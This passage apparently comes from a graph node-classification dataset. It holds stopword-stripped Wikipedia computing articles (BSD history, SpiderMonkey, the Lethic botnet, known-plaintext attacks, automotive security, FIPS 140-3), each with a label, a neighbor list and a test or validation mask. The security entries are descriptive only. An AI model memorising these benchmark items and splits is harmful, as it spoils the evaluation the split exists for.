osi network protocol stack improvements kernel virtual memory system van jacobson lbl new tcp/ip algorithms accommodate growth internet versions bsd used proprietary unix code therefore subject software license source code licenses become expensive several outside parties expressed interest separate release networking code developed entirely outside would subject licensing requirement led networking release 1 net/1 made available non-licensees code freely redistributable terms bsd license released june 1989 net/1 bsd developer keith bostic proposed non-at sections bsd system released license net/1 end started project reimplement standard unix utilities without using code within eighteen months utilities replaced determined files remained kernel files removed result june 1991 release networking release 2 net/2 nearly complete operating system freely distributable net/2 basis two separate ports bsd intel 80386 architecture free 386bsd william jolitz proprietary bsd/386 later renamed bsd/os berkeley software design bsdi 386bsd short-lived became initial code base netbsd freebsd projects started shortly thereafter bsdi soon found legal trouble unix system laboratories usl subsidiary owners system v copyright unix trademark usl v. bsdi lawsuit filed 1992 led injunction distribution net/2 validity usl copyright claims source could determined lawsuit slowed development free-software descendants bsd nearly two years legal status question result systems based linux kernel legal ambiguity gained greater support lawsuit settled january 1994 largely berkeley favor 18,000 files berkeley distribution three removed 70 modified show usl copyright notices condition settlement usl would file lawsuits users distributors berkeley-owned code upcoming 4.4bsd release final release berkeley 1995 4.4bsd-lite release 2 csrg dissolved development bsd berkeley ceased since several variants based directly indirectly 4.4bsd-lite freebsd netbsd openbsd dragonfly bsd maintained permissive nature bsd license allowed many operating systems open-source proprietary incorporate bsd source code example microsoft windows used bsd code implementation tcp/ip bundles recompiled versions bsd command-line networking tools since windows 2000 darwin basis apple macos ios based 4.4bsd-lite2 freebsd various commercial unix operating systems solaris also incorporate bsd code starting 8th edition versions research unix bell labs close relationship bsd began 4.1cbsd vax used basis research unix 8th edition continued subsequent versions 9th edition incorporated source code improvements 4.3bsd result later versions research unix closer bsd system v. usenet posting 2000 dennis ritchie described relationship bsd research unix eric s. raymond summarizes longstanding relationship system v bsd stating divide roughly longhairs shorthairs programmers technical people tended line berkeley bsd business-oriented types system v. 1989 david a. curry wrote differences bsd system v. characterized system v often regarded standard unix however described bsd popular among university government computer centers due advanced features performance berkeley unix first unix include libraries supporting internet protocol stacks berkeley sockets unix implementation ip predecessor arpanet ncp ftp telnet clients produced university illinois 1975 available berkeley however memory scarcity pdp-11 forced complicated design performance problems integrating sockets unix operating system file descriptors became almost easy read write data across network access disk laboratory eventually released streams library incorporated much functionality software stack different architecture wide distribution existing sockets library reduced impact new api early versions bsd used form sun microsystems sunos founding first wave popular unix workstations bsd operating systems run much native software several operating systems architecture using binary compatibility layer much simpler faster emulation allows instance applications intended linux run effectively full speed makes bsds suitable server environments also workstation ones given increasing availability commercial closed-source software linux also allows administrators migrate legacy commercial applications may supported commercial unix variants modern operating system retaining functionality applications replaced better alternative current bsd operating system variants support many common ieee ansi iso posix standards retaining traditional bsd behavior like unix bsd kernel monolithic meaning device drivers kernel run privileged mode part core operating system several operating systems based bsd including freebsd openbsd netbsd midnightbsd dragonfly bsd netbsd freebsd created 1993 initially derived 386bsd also known jolix merged 4.4bsd-lite source code 1994 openbsd forked netbsd 1995 dragonfly bsd forked freebsd 2003 bsd also used basis several proprietary versions unix sun sunos sequent dynix next nextstep dec ultrix osf/1 axp tru64 unix nextstep later became foundation apple inc. macos",
    "neighbors": [
      6155,
      2061,
      2062,
      19,
      8213,
      25,
      6180,
      8243,
      10292,
      2109,
      8262,
      2120,
      6218,
      6221,
      10318,
      2132,
      10333,
      97,
      8298,
      10346,
      2168,
      8316,
      2179,
      132,
      2180,
      10382,
      2197,
      6296,
      2201,
      178,
      6329,
      190,
      8388,
      10436,
      2248,
      4296,
      8395,
      2253,
      6361,
      8410,
      6369,
      10469,
      231,
      6378,
      4333,
      242,
      2294,
      8438,
      8441,
      2301,
      4349,
      10499,
      6412,
      273,
      8476,
      292,
      2345,
      6445,
      2355,
      10547,
      8504,
      4409,
      6459,
      2364,
      8516,
      4423,
      330,
      8524,
      2397,
      10590,
      2401,
      8551,
      8553,
      376,
      2424,
      8573,
      10623,
      6534,
      394,
      4492,
      414,
      2462,
      4514,
      421,
      4521,
      4525,
      10670,
      10676,
      8631,
      8651,
      463,
      470,
      472,
      8671,
      6624,
      10730,
      10731,
      4589,
      8687,
      499,
      2560,
      10752,
      10761,
      2579,
      6675,
      8725,
      10774,
      2584,
      10776,
      4637,
      546,
      4643,
      10803,
      10809,
      576,
      2625,
      6727,
      585,
      607,
      10851,
      6760,
      10856,
      4727,
      633,
      634,
      6780,
      640,
      6787,
      10883,
      4745,
      10891,
      6797,
      8852,
      10900,
      6808,
      10908,
      6813,
      671,
      4775,
      684,
      6828,
      8879,
      6837,
      8889,
      8909,
      10971,
      739,
      741,
      11001,
      2811,
      4859,
      11013,
      8977,
      787,
      788,
      789,
      8991,
      4908,
      2864,
      823,
      6969,
      9019,
      11068,
      9027,
      11075,
      6988,
      850,
      9063,
      11112,
      873,
      7020,
      2933,
      7039,
      2944,
      11145,
      7057,
      5022,
      935,
      5036,
      11184,
      2995,
      9141,
      9153,
      11204,
      11205,
      5067,
      9166,
      3042,
      7152,
      5105,
      11257,
      5115,
      11269,
      5130,
      9231,
      7187,
      5158,
      1064,
      1071,
      7217,
      1080,
      5177,
      7224,
      3142,
      1101,
      7249,
      7252,
      1109,
      3160,
      9306,
      11357,
      11363,
      9320,
      7285,
      9335,
      1147,
      3197,
      1150,
      5247,
      7293,
      9342,
      11390,
      3206,
      7303,
      5256,
      7309,
      9366,
      9370,
      7325,
      3237,
      9383,
      3241,
      5292,
      3248,
      11442,
      5315,
      7364,
      3284,
      7382,
      9436,
      1247,
      11488,
      11489,
      9444,
      1253,
      7403,
      9452,
      11501,
      5363,
      1273,
      9466,
      9468,
      1278,
      1286,
      9487,
      1298,
      11539,
      5397,
      3350,
      7445,
      1304,
      1316,
      5413,
      7460,
      7477,
      1335,
      7483,
      11595,
      5452,
      5457,
      11601,
      7507,
      11604,
      7511,
      11608,
      5472,
      3426,
      1379,
      5484,
      11635,
      5492,
      7552,
      5506,
      7561,
      1422,
      7566,
      11667,
      11675,
      5534,
      3487,
      3488,
      1445,
      9643,
      7601,
      11698,
      9665,
      3526,
      9671,
      3548,
      3551,
      1508,
      7666,
      5619,
      1530,
      7682,
      9743,
      5652,
      7702,
      1561,
      3615,
      9762,
      1574,
      9784,
      1594,
      3651,
      7748,
      5702,
      9798,
      3659,
      3667,
      3684,
      9835,
      7806,
      5771,
      9882,
      9887,
      3752,
      7848,
      9907,
      9909,
      1718,
      5819,
      5823,
      9927,
      1736,
      9931,
      9932,
      5840,
      7907,
      1804,
      1813,
      3867,
      10016,
      3885,
      1839,
      7983,
      10036,
      7999,
      10051,
      3918,
      5969,
      8020,
      3939,
      8063,
      3969,
      10113,
      8069,
      1927,
      3976,
      3978,
      8092,
      6049,
      10156,
      1971,
      1976,
      6075,
      6078,
      4040,
      8136,
      8147,
      2010,
      10202,
      6116,
      6119,
      6120,
      4073,
      2028,
      4076,
      6128,
      2035,
      10235,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9152,
    "label": 9,
    "text": "SpiderMonkey:spidermonkey spidermonkey code name first javascript engine written brendan eich netscape communications later released open-source currently maintained mozilla foundation eich wrote javascript ten days 1995 recruited netscape promise 'doing scheme browser idea using scheme abandoned engineering management decided language must ‘ look like java ’ fall 1996 eich needing pay substantial technical debt left first year stayed home two weeks rewrite mocha codebase became known spidermonkey mocha original working name language name spidermonkey may chosen reference movie beavis butt-head america character tom anderson mentions title characters whacking like couple spider monkeys 2011 eich transferred management spidermonkey code dave mandelin spidermonkey implements ecma-262 edition 5.1 ecmascript several added features ecma-357 ecmascript xml e4x dropped early 2013 even though spidermonkey used firefox provide host environments document object model dom mozilla projects support dom gecko provides host environment spidermonkey written c/c++ contains interpreter ionmonkey jit compiler garbage collector tracemonkey first jit compiler written javascript language compiler first released part spidermonkey firefox 3.5 providing performance improvements ranging 20 40 times faster baseline interpreter firefox 3 instead compiling whole functions tracemonkey tracing jit operates recording control flow data types interpreter execution data informed construction trace trees highly specialized paths native code improvements jägermonkey eventually made tracemonkey obsolete especially development spidermonkey type inference engine tracemonkey absent spidermonkey firefox 11 onward jägermonkey internally named methodjit whole-method jit compiler designed improve performance cases tracemonkey could generate stable native code first released firefox 4 eventually entirely supplanted tracemonkey replaced ionmonkey jägermonkey operated differently compilers class typical compilers worked constructing optimizing control flow graph representing function jägermonkey instead operated iterating linearly forward spidermonkey bytecode internal function representation although prohibits optimizations require instruction reordering jägermonkey compiling advantage fast useful javascript since recompiling due changing variable types frequent mozilla implemented number critical optimizations jägermonkey importantly polymorphic inline caches type inference difference tracemonkey jägermonkey jit techniques need explained hacks.mozilla.org article in-depth explanation technical details provided chris leary one spidermonkey developers blog post technical information found developer blogs dvander dmandelin ionmonkey name mozilla current javascript jit compiler aims enable many new optimizations impossible prior jägermonkey architecture ionmonkey traditional compiler translates spidermonkey bytecode control flow graph using static single assignment form ssa intermediate representation architecture enables well-known optimizations programming languages used javascript including type specialization function inlining linear-scan register allocation dead code elimination loop-invariant code motion compiler emit fast native code translations javascript functions arm x86 x86-64 platforms default engine since firefox 18 odinmonkey name mozilla new optimization module asm.js easily compilable subset javascript odinmonkey jit compiler uses current jit compiler included firefox release 22 spidermonkey intended embedded applications provide host environments javascript incomplete list follows spidermonkey includes javascript shell interactive javascript development command-line invocation javascript program files",
    "neighbors": [
      9736,
      19,
      9757,
      31,
      9281,
      7234,
      4171,
      84,
      6231,
      603,
      1632,
      5219,
      10860,
      9843,
      4728,
      637,
      1664,
      6791,
      8854,
      11418,
      1713,
      3761,
      7861,
      11449,
      5311,
      7871,
      7889,
      4822,
      7396,
      5356,
      9964,
      10991,
      8443,
      2304,
      259,
      5380,
      10507,
      3854,
      1295,
      7439,
      7951,
      2836,
      10006,
      4378,
      7455,
      803,
      7983,
      11060,
      2880,
      10057,
      2893,
      6477,
      11087,
      339,
      9560,
      10078,
      10083,
      5483,
      10097,
      7543,
      1399,
      1409,
      3462,
      8605,
      8609,
      10145,
      438,
      5054,
      9152,
      10703,
      5078,
      4056,
      482,
      10722,
      487,
      8169,
      9195,
      5612,
      9714,
      499,
      6133,
      5114,
      2045,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9153,
    "label": 2,
    "text": "BSD_Daemon:bsd daemon bsd daemon nicknamed beastie generic mascot bsd operating systems bsd daemon named software daemons class long-running computer programs unix-like operating systems play words takes cartoon shape demon bsd daemon nickname beastie slurred phonetic pronunciation bsd beastie customarily carries trident symbolize software daemon forking processes freebsd web site noted evi nemeth 1988 remarks cultural-historical daemons unix system administration handbook ancient greeks concept 'personal daemon similar modern concept 'guardian angel ... rule unix systems seem infested daemons demons copyright official bsd daemon images held marshall kirk mckusick early bsd developer worked bill joy freely licensed mascot individual personal use within bounds good taste example bad taste picture bsd daemon blowtorching solaris logo use requires copyright notice attribution reproduction daemon quantity t-shirts cdroms requires advance permission mckusick restricts use implementations bsd company logo although companies bsd-based products scotgold wind river systems gotten kind permission mckusick said early 1990s almost lost daemon certain large company failed show due diligence protecting 've taken due diligence seriously since request use license creative commons mckusick replied prefer bsd daemon used context bsd software reason carefully control copyright bsd daemon image ensure image used inappropriately agreed allow small image appear wikipedia larger ones also going put creative commons copyright bsd daemon first drawn 1976 comic artist phil foglio developer mike o'brien working bonded locksmith time opened wall safe foglio chicago apartment roommate split town without leaving combination return foglio agreed draw t-shirt artwork o'brien gave polaroid snaps pdp-11 system running unix along notions visual puns pipes demons/daemons forks bit bucket named /dev/null etc foglio drawing showed four happy little red daemon characters carrying tridents climbing falling water pipes front caricature pdp-11 used first national unix meeting us held urbana illinois bell labs bought dozens t-shirts featuring drawing subsequently appeared unix t-shirts decade usenix purchased reproduction rights foglio artwork 1986 original drawing apparently lost shortly sent digital equipment corporation use advertisement known copies photographs surviving t-shirts later popular versions bsd daemon drawn animation director john lasseter beginning early greyscale drawing cover unix system manager manual published 1984 usenix 4.2bsd author/editor sam leffler technical staff member csrg lasseter employees lucasfilm time four years lasseter drew widely known take bsd daemon cover mckusick co-authored 1988 book design implementation 4.3bsd operating system lasseter drew somewhat lesser-known running bsd daemon 4.4bsd version book 1994 1994 2004 netbsd project used artwork shawn mueller logo featuring four bsd daemons pose similar famous photo raising flag iwo jima however logo seen inappropriate international project superseded abstract flag logo chosen 400 entries competition early versions openbsd 2.3 2.4 used bsd daemon halo briefly used daemon police officer version 2.5 however openbsd switched puffy blowfish mascot freebsd project used 1988 lasseter drawing logo mascot 12 years however questions arose graphic effectiveness logo daemon unique freebsd since historically used bsd variants members freebsd core team considered inappropriate corporate marketing purposes lithographically scanned lasseter drawing line art however drawn neither scaled easily wide range sizes rendered appealingly two three colours contest create new freebsd logo began february 2005 scalable graphic somewhat echoes bsd daemon head chosen following october although little red fellow kept official project mascot walnut creek cdrom also produced two variations daemon cdrom covers freebsd 1.0 1.1 cdrom covers used 1988 lasseter drawing freebsd 2.0 cdrom used variant different colored specifically green tennis shoes distributions used image different colored tennis shoes years starting freebsd 2.0.5 walnut creek cdrom covers used daemon walking cdrom starting freebsd 4.5 freebsd mall used mirrored image walnut creek 2.0 image walnut creek 2.0 image also appeared cover different freebsd handbook editions mid-1990s marketer walnut creek cdrom called mascot chuck perhaps referring brand name kind shoes worn character name strongly deprecated copyright holder said bsd daemon proud fact name bsd daemon insist name call beastie ascii art image bsd daemon felix lee appeared startup menu freebsd version 5.x still set startup image later versions also used daemon_saver screensaver",
    "neighbors": [
      7552,
      5506,
      1927,
      4745,
      10761,
      2061,
      9743,
      5397,
      7702,
      8725,
      5534,
      1316,
      11689,
      684,
      4908,
      1839,
      7983,
      1718,
      823,
      1080,
      9151,
      3651,
      7748,
      10436,
      4423,
      9927,
      8395,
      2253,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      8671,
      9320,
      873,
      9452,
      633,
      8316,
      9342
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9154,
    "label": 4,
    "text": "Lethic_botnet:lethic botnet lethic botnet initially discovered around 2008 botnet consisting estimated 210 000 310 000 individual machines mainly involved pharmaceutical replica spam around early january 2010 botnet dismantled neustar employees contacted various lethic internet service providers bid take control botnet command control servers move temporarily caused botnets spam decrease trickle original volume february 2010 owners botnet managed re-establish control botnet use new command control servers located united states takedown decreased spam volume botnet however february 2010 botnets amount spam third original april 2010 botnet estimated 1.5 share spam market sending 2 billion spam messages day",
    "neighbors": [
      3072,
      10756,
      3724,
      3347,
      4883,
      2325,
      278,
      9630,
      10657,
      4648,
      939,
      46,
      10297,
      3643,
      7739,
      7996,
      11583,
      9664,
      8133,
      10952,
      2508,
      81,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      3941,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9155,
    "label": 3,
    "text": "List_of_devices_using_Mediatek_SoCs:list devices using mediatek socs page lists every major device using mediatek system-on-a-chip soc organized chip devices uses based 32-bit arm7ej-s risc processor smartwatches mt6223c direct support cif camera based 32-bit arm7ej-s risc processor mt6238 support 3mp camera soc support java applications midp-2.1 cldc-1.1 instruction sets mediatek first soc compatible 3g networks smartwatches smartwatches",
    "neighbors": [
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      8250,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      7835,
      4258,
      4773,
      9913,
      7869,
      8383,
      10945,
      9928,
      4305,
      2788,
      3301,
      9964,
      6391,
      3835,
      781,
      2838,
      5417,
      810,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      5028,
      7077,
      9638,
      10675,
      3511,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 9156,
    "label": 4,
    "text": "Known-plaintext_attack:known-plaintext attack known-plaintext attack kpa attack model cryptanalysis attacker access plaintext called crib encrypted version ciphertext used reveal secret information secret keys code books term crib originated bletchley park british world war ii decryption operation usage crib adapted slang term referring cheating e.g. cribbed answer test paper crib originally literal interlinear translation foreign-language text—usually latin greek text—that students might assigned translate original language idea behind crib cryptologists looking incomprehensible ciphertext clue word phrase might expected ciphertext would wedge test break otherwise random attacks cipher managed sometimes produce words preferably phrases would know might right track words phrases appeared would feed settings used reveal back whole encrypted message good effect case enigma german high command meticulous overall security enigma system understood possible problem cribs day-to-day operators hand less careful bletchley park team would guess plaintext based upon message sent recognizing routine operational messages instance daily weather report transmitted germans time every day due regimented style military reports would contain word wetter german weather location every message knowing local weather conditions helped bletchley park guess parts plaintext well operators would send standard salutations introductions officer stationed qattara depression consistently reported nothing report heil hitler occurring end message another well-known example bletchley park world war ii strenuous efforts made use even force germans produce messages known plaintext example cribs lacking bletchley park would sometimes ask royal air force seed particular area north sea mines process came known gardening obvious reference enigma messages soon sent would likely contain name area harbour threatened mines germans could accommodating regard whenever turned german double-cross agents sent message written british respective handlers frequently obligingly re-encrypted message word word enigma onward transmission berlin captured german revealed interrogation enigma operators instructed encode numbers spelling alan turing reviewed decrypted messages determined number eins one common string plaintext automated crib process creating eins catalogue assumed eins encoded positions plaintext catalogue included every possible position various rotors starting positions keysettings enigma polish cipher bureau likewise exploited cribs anx method world war ii germans use german followed x spacer form text anx united states britain used one-time tape systems 5-uco sensitive traffic devices immune known-plaintext attack however point-to-point links required massive supplies one time tapes networked cipher machines considered vulnerable cribs various techniques used disguise beginning ends message including cutting messages half sending second part first adding nonsense padding ends latter practice resulted world wonders incident kl-7 introduced mid-1950s first u.s. cipher machine considered safe known-plaintext attack classical ciphers typically vulnerable known-plaintext attack example caesar cipher solved using single letter corresponding plaintext ciphertext decrypt entirely general monoalphabetic substitution cipher needs several character pairs guessing fewer 26 distinct pairs",
    "neighbors": [
      1797,
      2957,
      4497,
      658,
      6164,
      1941,
      2341,
      9381,
      3629,
      11185,
      1970,
      4036,
      6863,
      9556,
      8286,
      9058,
      11241,
      1898,
      11119,
      10997,
      7416,
      7161,
      8318
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9157,
    "label": 3,
    "text": "Socket_AM2:socket am2 socket am2 renamed socket m2 prevent using name cyrix mii processors cpu socket designed amd desktop processors including performance mainstream value segments released may 23 2006 replacement socket 939 am2 processors incompatible 939 motherboards vice versa although 940 pins incompatible socket 940 socket am2 supports ddr2 sdram memory ddr memory previous socket 939 supported anandtech reported socket am2 system performance 7 faster socket 939 equivalents applications 2 faster despite 30 greater memory bandwidth due ddr2 support first processor cores support socket am2 single-core orleans athlon 64 manila sempron dual-core windsor athlon 64 x2 athlon 64 fx processors socket am2 include sse3 instructions developed 90 nanometer technology later models featured 65 nanometer technology socket am2 also supports newer amd phenom processors originally built socket am2+ backward compatible am2 however depended upon system/motherboard manufacturer supply bios firmware update operate processor socket am2 part amd generation cpu sockets included socket f servers socket s1 mobile computing also single-socket opteron processors available am2 technical documentation readily available earlier generations amd processor sockets am2 processor functional data sheet amd document number 31117 made publicly available 4 holes fastening heatsink motherboard placed rectangle lateral lengths 48 mm 96 mm amd sockets socket am2 socket am2+ socket am3 socket am3+ socket fm2 cooling solutions therefore interchangeable multiple sockets announced theory pin-compatible socket am2 differ terms features socket am2+ intermediate successor socket am2 features split power planes hypertransport 3.0 socket am2+ chips plug socket am2 motherboard although certain motherboard manufacturers support operate hypertransport 2.0 socket am3 processors able run socket am2 am2+ motherboards appropriate bios updates vice versa am3 processors new memory controller supporting ddr2 ddr3 sdram allowing backwards compatibility am2 am2+ motherboards since am2 am2+ processors lack new memory controller work am3 motherboards",
    "neighbors": [
      3586,
      8322,
      3588,
      8452,
      9475,
      3464,
      4872,
      7058,
      10260,
      4246,
      3352,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      3783,
      7247,
      9551,
      977,
      7122,
      9427,
      4695,
      10715,
      7132,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9158,
    "label": 3,
    "text": "Adjust_flag:adjust flag adjust flag cpu flag flags register x86-compatible cpus preceding 8080-family also called auxiliary flag auxiliary carry flag ac flag bit located position 4 cpu flag register indicates arithmetic carry borrow generated four least significant bits lower nibble primarily used support binary-coded decimal bcd arithmetic auxiliary flag set 1 add operation carry low nibble lowest four bits high nibble upper four bits borrow high nibble low nibble low-order 8-bit portion subtraction otherwise carry borrow occurs flag cleared reset set 0",
    "neighbors": [
      11107,
      9668,
      11499,
      3630,
      5234,
      3699,
      499,
      602
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9159,
    "label": 3,
    "text": "Peripheral_pin_controller:peripheral pin controller peripheral pin controller ppc feature intel strong arm processor family enable disable i/o ports also allows user make uses pins normally dedicated peripherals peripheral disabled pins available general purpose use set predetermined alternate uses serial ports 1 4",
    "neighbors": [
      1776
    ],
    "mask": "Test"
  },
  {
    "node_id": 9160,
    "label": 4,
    "text": "Automotive_security:automotive security automotive security refers branch computer security focused cyber risks related automotive context increasingly high number ecus vehicles alongside implementation multiple different means communication towards vehicle remote wireless manner led necessity branch cybersecurity dedicated threats associated vehicles confused automotive safety implementation multiple ecus electronic control units inside vehicles began early '70s thanks development integrated circuits microprocessors made economically feasible produce ecus large scale since number ecus increased 100 per vehicle units nowadays control almost everything vehicle simple tasks activating wipers safety-related ones like brake-by-wire abs anti-lock braking system autonomous driving also strongly reliant implementation new complex ecus adas alongside sensors lidars radars control units inside vehicle ecus connected cabled wireless communication networks bus controller area network bus media oriented system transport flexray rf radio frequency many implementations tpmss tire pressure monitoring systems important notice many ecus require data received networks arrive various sensors operate use data modify behavior vehicle e.g. cruise control modifies vehicle speed depending signals arriving button usually located steering wheel since development cheap wireless communication technologies bluetooth lte wi-fi rfid similar automotive producers oems designed ecus implement technologies goal improving experience driver passengers safety-related systems onstar general motors telematic units communication smartphones vehicle speakers bluetooth android auto apple carplay rkes remote keyless entry systems examples vehicle become externally connected devices cases internet furthermore since 2016 development implementation marketed vehicles v2x technologies long- short-range communication interfaces vehicle become considerably bigger although implementation new technologies devices improved safety driving experience vehicle increasingly high number externally-communicating units inside vehicle led increment dimension attack surfaces vehicle electronic control units nowadays capability modifying behavior vehicle necessary ensure attacker capabilities take control critical systems inside vehicle due last ten fifteen years new concept automotive security started become important designing new vehicles threat models automotive world based real-world theoretically possible attacks real-world attacks aim safety people around car modifying cyber-physical capabilities vehicle e.g. steering braking accelerating without requiring actions driver theoretical attacks supposed focus also privacy-related goals obtaining gps data vehicle capturing microphone signals similar regarding attack surfaces vehicle usually divided long-range short-range local attack surfaces lte dsrc considered long-range ones bluetooth wi-fi usually considered short-range although still wireless finally usb obd-ii attack surfaces require physical access car defined local attacker able implement attack long-range surface considered stronger dangerous one requires physical access vehicle 2015 possibility attacks vehicles already market proven possible miller valasek managed disrupt driving jeep cherokee remotely connecting remote wireless communication common network used vehicles one mainly used safety-related communication due real-time properties simplicity cheapness reason majority real-world attacks implemented ecus connected type network majority attacks demonstrated either actual vehicles testbeds fall one following categories sniffing computer security field generally refers possibility intercepting logging packets generally data network case since bus network every node listens communication network useful attacker read data learn behavior nodes network implementing actual attack usually final goal attacker simply sniff data since packets passing type network usually valuable read dos information security usually described attack objective making machine network unavailable dos attacks ecus connected buses done network abusing arbitration protocol used always win arbitration targeting single ecu abusing error handling protocol second case attacker flags messages victim faulty convince victim broken therefore shut network spoofing attacks comprise cases attacker falsifying data sends messages pretending another node network automotive security usually spoofing attacks divided masquerade replay attacks replay attacks defined attacker pretends victim sends sniffed data victim sent previous moment masquerade contrary spoofing attacks data payload created attacker increasing complexity devices networks automotive context requires application security measures limit capabilities potential attacker since early 2000 many different countermeasures proposed cases applied following list common security measures",
    "neighbors": [
      899,
      5636,
      10756,
      9607,
      9356,
      9488,
      3473,
      8978,
      7700,
      10392,
      5373,
      5246,
      4892,
      5404,
      8094,
      2975,
      2084,
      2213,
      8998,
      939,
      1453,
      3629,
      3887,
      7855,
      9646,
      1970,
      5433,
      7739,
      3262,
      9791,
      4163,
      3525,
      7368,
      5325,
      2262,
      6360,
      9688,
      7515,
      4956,
      9440,
      3941,
      6373,
      107,
      11244,
      2041,
      10492,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9161,
    "label": 3,
    "text": "The_Castle_(video_game):castle video game castle computer game released ascii corporation 1986 fm-7 x1 computers later ported msx nec branded personal computers got single console port sg-1000 game set within castle containing 100 rooms contain one puzzles object game navigate castle rescue princess player push certain objects throughout game accomplish progress rooms prince advance next room aligning cement blocks honey jars candle cakes elevator controlling block additionally player progress blocked many doors requiring key color unlock key removed player inventory upon use prince must standing platform next door able unlock simply jump fall press door player navigate castle help map obtained early game map provide player matrix 10x10 rooms highlight room princess located rooms visited player must also avoid touching enemies like knights bishops wizards fire spirits attack cats phantom flowers followed castlequest also known castle excellent japan games notable early examples metroidvania genre",
    "neighbors": [
      5762,
      8371,
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9162,
    "label": 2,
    "text": "Sintran_III:sintran iii sintran iii real-time multitasking multi-user operating system used norsk data computers 1974 unlike predecessors sintran ii entirely written norsk data sintran iii written nord pl intermediate language norsk data computers sintran primarily command line based operating system though several shells could installed control user environment strictly far popular user-environment one clever features able abbreviate commands filenames hyphens example list-files typed would ask several prompts including print paging etc. could override using following li-fi n would abbreviate list-files command prompt bypass prompts one could also refer files way say ped h-w would refer hello-world symb file h number characters hyphen w number characters file ending saved quite lot keystrokes would allow users nice learning curve complete self-explanatory commands like list-all-files l-a-f advanced user hyphen key norwegian keyboards resides slash key u.s ones sintran mostly disappeared operating system references however job control batch language available called jec believed known job execution controller could used set batch jobs compile cobol programs etc",
    "neighbors": [
      10883,
      6276,
      6675,
      276,
      9366,
      7319,
      2201,
      9628,
      2345,
      10030,
      7983,
      6207,
      321,
      10561,
      1221,
      8262,
      9927,
      6985,
      341,
      10590,
      2399,
      6624,
      5603,
      5220,
      1253,
      1126,
      10482,
      11383
    ],
    "mask": "None"
  },
  {
    "node_id": 9163,
    "label": 3,
    "text": "List_of_applications_of_ARM_cores:list applications arm cores list applications arm cores lists products using various arm microprocessor cores sorted generation release name",
    "neighbors": [
      1537,
      7170,
      9732,
      8720,
      11282,
      9235,
      11289,
      1057,
      6178,
      38,
      4139,
      8237,
      9774,
      2097,
      11314,
      8250,
      8253,
      7745,
      7235,
      7747,
      4679,
      11337,
      2635,
      10838,
      6748,
      99,
      8812,
      10862,
      11374,
      10361,
      6266,
      638,
      644,
      9863,
      8842,
      11405,
      9359,
      146,
      659,
      1170,
      1682,
      7833,
      666,
      5786,
      10393,
      669,
      4258,
      4773,
      4264,
      682,
      5291,
      2224,
      9913,
      7866,
      4283,
      8383,
      9408,
      10945,
      199,
      9928,
      2258,
      4821,
      5339,
      3293,
      2788,
      3300,
      3301,
      4324,
      9964,
      2285,
      9970,
      6391,
      3835,
      2814,
      2308,
      5384,
      781,
      6925,
      7445,
      8472,
      5417,
      2862,
      7988,
      10548,
      11062,
      1849,
      6971,
      1346,
      8003,
      10562,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6996,
      6495,
      1377,
      11629,
      5998,
      6001,
      2420,
      373,
      8058,
      10109,
      8577,
      11655,
      392,
      1428,
      5019,
      4508,
      5028,
      7077,
      9638,
      3511,
      2492,
      1471,
      9155,
      2502,
      456,
      6607,
      464,
      6608,
      7631,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      3043,
      10223,
      1014,
      3575,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 9164,
    "label": 4,
    "text": "Countersign_(legal):countersign legal countersigning means writing second signature onto document example contract official document signed representative company may countersigned supervisor verify authority representative also money order financial instrument may signed upon receipt signed person presented payment indication bearer person originally received item thief stolen item could carried place presented example countersignature needed uk passport applications constitutional monarchies parliamentary republics order head state monarch president valid unless countersigned another authorised relevant person head government responsible minister case promulgation parliamentary resolution presiding officer legislature",
    "neighbors": [
      9576
    ],
    "mask": "None"
  },
  {
    "node_id": 9165,
    "label": 4,
    "text": "FIPS_140-3:fips 140-3 federal information processing standard fips publication 140-3 announced update u.s. government computer security standard used accredit cryptographic modules title standard security requirements cryptographic modules fips 140-2 remains currently approved version efforts update fips 140-2 date back early 2000s fips 140-3 2013 draft scheduled signature secretary commerce august 2013 however never happened draft subsequently abandoned 2014 nist released substantially different draft fips 140-3 version effectively directing use international organization standardization/international electrotechnical commission iso/iec standard 19790:2012 replacement fips 140-2 2014 draft fips 140-3 also abandoned august 12 2015 nist formally released statement federal register asking comments potential use portions iso/iec 19790:2014 update fips 140-2 reference 2014-version iso/iec 19790 inadvertent error federal registry posting 2012 recent version update process fips 140 hamstrung deep technical issues topics hardware security apparent disagreement us government path forward abandoned 2013 draft fips 140-3 required mitigation non-invasive attacks validating higher security levels introduced concept public security parameter allowed deference certain self-tests specific conditions met strengthened requirements user authentication integrity testing remains unclear whether issues addressed ultimately approved release fips 140-3 national institute standards technology nist issued fips 140 publication series coordinate requirements standards cryptography modules include hardware software components federal agencies departments validate module use covered existing fips 140-2 certificate specifies exact module name hardware software firmware and/or applet version numbers cryptographic modules produced private sector open source communities use u.s. government regulated industries financial health-care institutions collect store transfer share disseminate sensitive unclassified sbu information commercial cryptographic module also commonly referred hardware security module fips 140-2 establishes cryptographic module validation program cmvp joint effort nist communications security establishment csec canadian government security programs overseen nist csec focus working government industry establish secure systems networks developing managing promoting security assessment tools techniques services supporting programs testing evaluation validation addresses areas development 